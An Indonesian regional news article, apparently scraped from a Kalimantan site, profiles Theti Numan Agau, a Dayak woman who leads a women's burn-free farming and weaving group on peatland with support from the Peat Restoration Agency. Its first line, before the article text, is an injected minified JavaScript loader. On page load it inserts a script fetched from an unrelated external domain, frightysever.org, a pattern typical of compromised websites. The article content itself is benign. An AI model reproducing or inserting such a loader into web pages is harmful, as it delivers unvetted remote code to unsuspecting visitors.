(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lingkungan

Theti Numan Agau, Perempuan Dayak yang Melawan Perubahan Iklim di Lahan Gambut


Perempuan memiliki peluang besar untuk berkontribusi dalam upaya kolektif melawan perubahan iklim. Hal ini yang dilakukan Theti Numan Agau. Perempuan Dayak asal Desa Mantangai Hilir, Kecamatan Mantangai, Kabupaten Kapuas, Provinsi Kalimantan Tengah.

Tinggal di wilayah yang mengalami bencana kebakaran hutan dan lahan parah pada 2015 silam membuat Theti susah bernapas. Selain itu Theti juga mengaku susah melakukan aktivitas lainnya termasuk bekerja. Otomatis, selama kebakaran ini, ia hanya mengandalkan sisa-sisa panen terdahulu.

Persatuan Bangsa-bangsa (PBB) sendiri melansir bahwa orang yang mengungsi akibat perubahan iklim 80 persennya adalah perempuan. Hal ini dikarenakan perempuan di seluruh dunia memiliki hak yang lebih sedikit.

Mereka juga lebih sedikit uang, dan lebih sedikit kebebasan sehingga pada saat kondisi ekstrem seperti bencana alam, perempuan sering menjadi pihak yang terpukul paling keras. Meskipun perempuan paling merasakan efek dari perubahan iklim, mereka memiliki peluang besar untuk berkontribusi melawan perubahan iklim .

Theti memulai melawan perubahan iklim akibat kebakaran hutan dengan bergabung dengan kelompok petani binaan Badan Restorasi Gambut (BRG). Lewat pelatihan ini, Theti diajarkan bagaimana metode pertanian ramah lingkungan untuk menyuburkan lahan.

Hal ini berbanding terbalik dengan kebiasaan petani umumnya yang melakukan pembakaran lahan gambut untuk menyuburkan tanah. Kebakaran besar yang terjadi pada tahun 2015 di beberapa provinsi di Kalimantan, membuat BRG mulai mengadakan pendekatan ke beberapa tokoh petani di desa-desa kunci. Salah satu petani yang ada dalam program inisiasi BRG adalah Theti Numan Agau.

“Kami tidak lagi membakar lahan dan diajarkan untuk membuat pupuk alami,” ujar Theti.

Dalam satu kelompok, ada 10 petani. Mulanya jumlah ini terbagi rata, yaitu lima lelaki dan lima perempuan. Namun usaha ini kurang mendapat sambutan dari petani lelaki. Theti pun inisiatif mengubah komposisi kelompok menjadi 10 perempuan.

Di lahan demplot, Theti dan perempuan lainnya bertanam tomat, cabai, dan kacang panjang. Hasil panennya diakui Theti mengalami kenaikan. Jika dulu, hasil pertanian hanya cukup untuk dimakan sendiri, kini Theti mengaku mulai bisa menjual hasil pertaniannya dan mulai menabung.

“Hasilnya bisa dipakai untuk makan dan kelebihannya bisa dipakai untuk menabung. Kalau dulu hanya cukup untuk makan tetapi sekarang kami bisa menjual hasil pertanian. Menjualnya pun tidak susah karena hasil pertanian ini lebih sehat. Kami memakai metode bertani yang ramah lingkungan. Sampai saat ini, kami telah panen sebanyak empat kali,” imbuh Theti.

Dalam pendampingan masyarakat, BRG menyadari pentingnya peran perempuan dalam menjaga gambut. Sampai saat ini, ada 773 anggota kelompok perempuan yang telah didampingi oleh BRG. Jumlah ini diharapkan dapat meningkat seiring waktu.

Selain bertani, Theti dan kelompok perempuan ini juga diberi keterampilan untuk meningkatkan nilai jual pada produk kerajinan anyaman yang dibuat dari rumput atau tanaman yang banyak tumbuh di lahan gambut. Para perempuan ini telah mampu membuat anyaman menjadi tas, topi, placemats, keranjang, tikar dan dompet yang siap dipasarkan.

“BRG menyadari pentingnya peran para perempuan dalam menjaga ekosistem gambut. Kami percaya jika perempuan diberdayakan, maka akan dapat mendorong perubahan besar dalam sikap dan perilaku melindungi,” kata Myrna A Safitri, Deputi Bidang Edukasi, Sosialisasi, Partisipasi dan Kemitraan BRG.

FAO sendiri menyebutkan bahwa perempuan berperan dalam menghasilkan 60 persen hingga 80 persen makanan di negara-negara berkembang. Perempuan memiliki pengetahuan dan keterampilan tradisional, terutama untuk mengelola sumber daya alam dan air dan di berbagai bidang seperti inovasi, pertanian, makanan, limbah, dan energi.

“Kita tidak dapat bicara tentang ketahanan pangan, tentang generasi emas jika soal pemenuhan nutrisi di tingkat keluarga diabaikan. Perempuan-perempuan kader sekolah lapang di lahan gambut menunjukkan bagaimana mereka berjuang untuk itu. Larangan pembakaran dalam pertanian gambut dijawab dengan solusi PLTB yang berbasis pada kebutuhan nutrisi keluarga,” tambah Myrna. (suara.com)

Reporter : Suara.com
Editor : Kk

Desy Arfianty

Recent Posts

Targetkan 5 Besar, Bupati Banjar Lepas Kontingen Popda Banjar Menuju HSS

KANALKALIMANTAN.COM, MARTAPURA - Kontingen Pekan Olahraga Pelajar Daerah (Popda) Kabupaten Banjar Tahun 2024 yang terdiri… Read More

29 menit ago

Kasus Cuci Uang Narkoba, Ayah Fredy Pratama Tak Ajukan Banding

KANALKALIMANTAN.COM, BANJARMASIN - Lian Silas, terdakwa kasus Tindak Pidana Pencucian Uang (TPPU) narkotika jaringan Fredy… Read More

1 jam ago

Kucing-kucingan Anak Kecil vs Satpol PP di Lampu Lalulintas Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Kali kesekian, anak kecil Penyandang Masalah Kesejahteraan Sosial (PMKS) di kawasan lampu… Read More

2 jam ago

WTP Ke-11 untuk Pemkab Banjar, Wabup Banjar: Ini Kerja Tulus Semua Perangkat Daerah

KANALKALIMANTAN, BANJARBARU - Pemerintah Kabupaten Banjar meraih Opini Wajar Tanpa Pengecualian (WTP) dari Badan Pemeriksa… Read More

3 jam ago

Buka Peningkatan Kapasitas Kader PKK se-Kabupaten Banjar, Ini Harapan Nurgita Tiyas

KANALKALIMANTAN.COM, MARTAPURA - Ketua Tim Penggerak PKK Kabupaten Banjar Hj Nurgita Tiyas membuka Peningkatan Kapasitas… Read More

14 jam ago

Klaim Restu PKS Turun di Pilwali Banjarmasin, Mukhyar Cari Dukungan Nasdem

KANALKALIMANTAN.COM, BANJARMASIN - H Mukhyar masuk dalam penjaringan bakal calon Wali Kota Banjarmasin di Sekretariat… Read More

14 jam ago

This website uses cookies.